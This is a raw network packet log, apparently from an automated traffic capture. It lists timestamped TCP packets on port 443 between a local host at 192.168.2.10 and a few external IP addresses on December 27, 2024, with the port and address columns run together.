                                                        Dec 27, 2024 08:47:56.410820961 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.413047075 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.413119078 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.416378021 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.416517019 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.418895006 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.418952942 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.480590105 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.480669022 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.483768940 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.483932972 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.486323118 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.486404896 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.488890886 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.489031076 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.491408110 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.491758108 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.494640112 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.494695902 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.497148991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.497209072 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.499777079 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.500804901 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.509836912 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.509918928 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.512288094 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.512372017 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.596510887 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.596662998 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.598982096 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.599189997 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.601620913 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.601784945 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.604115009 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.604186058 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.607366085 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.607466936 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.609894991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.612428904 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.671804905 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.671911955 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.674596071 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.674711943 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.677095890 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.677164078 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.680334091 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.680427074 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.682853937 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.682905912 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.685460091 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.685745955 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.688071966 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.688174963 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.691266060 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.691464901 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.701221943 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.701291084 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.703757048 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.703829050 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.787472010 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.787564993 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.790198088 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.790363073 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.792697906 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.792769909 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.795352936 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.795473099 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.798558950 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.798741102 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.801091909 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.801198959 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.863293886 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.863449097 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.865822077 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.866025925 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.868346930 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.868454933 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.870836973 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.870898008 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.874083042 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.874255896 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.876739025 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.876831055 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.879218102 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.879307032 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.882450104 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.882510900 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.884975910 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.885114908 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.894450903 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.894548893 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.897682905 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.897849083 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.981602907 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.981748104 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.983840942 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.983932972 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.986588001 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.986711979 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.988986969 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.989063978 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.992403984 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.992500067 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:56.994858980 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:56.994920015 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.061110973 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.061309099 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.063113928 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.063235998 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.066373110 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.066443920 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.068964005 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.069113970 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.071656942 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.071722031 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.074841022 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.074894905 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.077253103 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.077348948 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.080271959 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.080364943 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.086214066 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.086317062 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.088706017 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.088777065 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.171930075 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.172075987 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.175107002 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.175182104 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.177710056 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.177843094 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.180193901 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.180283070 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.183439016 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.183533907 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.185988903 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.186065912 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.251791000 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.251904964 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.254722118 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.254801035 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.257226944 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.257306099 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.259849072 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.259958982 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.262352943 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.262422085 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.265616894 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.265738964 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.268090963 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.268177032 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.270709038 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.270855904 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.277391911 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.277471066 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.279941082 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.280047894 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.280047894 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.363462925 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.363557100 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.366205931 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.366316080 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.368638039 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.368721008 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.371936083 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.372023106 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.374336004 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.374413967 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.376975060 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.377079010 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.443557024 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.443646908 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.445522070 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.445627928 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.448745966 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.448834896 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.451253891 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.451329947 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.453896999 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.453958988 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.456439018 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.456523895 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.459619999 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.459731102 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.462147951 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.462229967 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.464730024 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.464869976 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.471131086 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.471224070 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.473683119 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.473795891 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.557235956 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.557444096 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.559902906 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.559995890 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.562319040 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.562403917 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.565604925 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.565712929 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.568078041 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.568196058 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.570713997 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.570782900 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.636873007 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.638318062 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.639381886 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.640918970 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.641836882 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.641935110 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.645205975 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.645441055 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.647721052 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.648432016 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.650250912 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.650403976 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.653570890 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.653629065 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.656065941 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.656584024 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.662321091 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.662940979 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.664707899 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.664786100 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.748490095 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.749034882 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.751184940 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.751590967 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.753482103 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.753659010 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.756829977 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.757155895 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.759290934 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.761799097 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.762319088 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.762319088 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.762341022 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.766314983 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.828031063 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.828140974 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.830627918 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.830698013 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.833142042 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.833218098 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.836412907 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.836530924 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.838888884 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.838948011 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.841509104 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.841592073 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.844021082 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.844099998 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.847280979 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.847337961 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.853286028 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.853363991 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.856108904 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.856296062 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.939802885 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.939918041 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.942449093 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.942548037 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.944938898 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.945013046 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.947560072 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.947629929 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.950123072 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.950289965 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:57.953332901 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:57.953393936 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.019763947 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.019907951 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.021819115 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.022027969 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.024327040 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.024477005 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.027534008 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.027611971 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.030172110 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.030236006 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.032772064 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.032907963 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.035918951 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.036056995 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.038409948 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.038661957 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.041074991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.041230917 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.047311068 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.047420979 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.049798012 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.050569057 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.133439064 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.134319067 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.135972023 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.136061907 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.138530016 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.138891935 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.141789913 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.142313957 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.144304991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.144392967 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.146918058 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.147392988 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.213253021 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.213861942 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.215735912 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.216866016 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.218969107 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.221437931 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.221841097 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.221841097 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.221853018 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.222445011 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.224030018 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.224107027 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.226572037 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.226753950 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.229871035 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.230006933 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.232331991 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.232990026 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.238643885 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.238817930 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.240310907 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.240392923 CET44349741150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:58.240418911 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.240756035 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:58.241080046 CET49741443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:48:12.663614035 CET49801443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:12.663662910 CET44349801188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:12.663845062 CET49801443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:12.790318012 CET49801443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:12.790347099 CET44349801188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:12.790402889 CET44349801188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:12.790796041 CET49801443192.168.2.10188.132.183.159
                                                        Dec 27, 2024 08:48:12.790821075 CET44349801188.132.183.159192.168.2.10
                                                        Dec 27, 2024 08:48:13.821682930 CET49807443192.168.2.10206.206.125.221
                                                        Dec 27, 2024 08:48:13.821726084 CET44349807206.206.125.221192.168.2.10
                                                        Dec 27, 2024 08:48:13.821826935 CET49807443192.168.2.10206.206.125.221
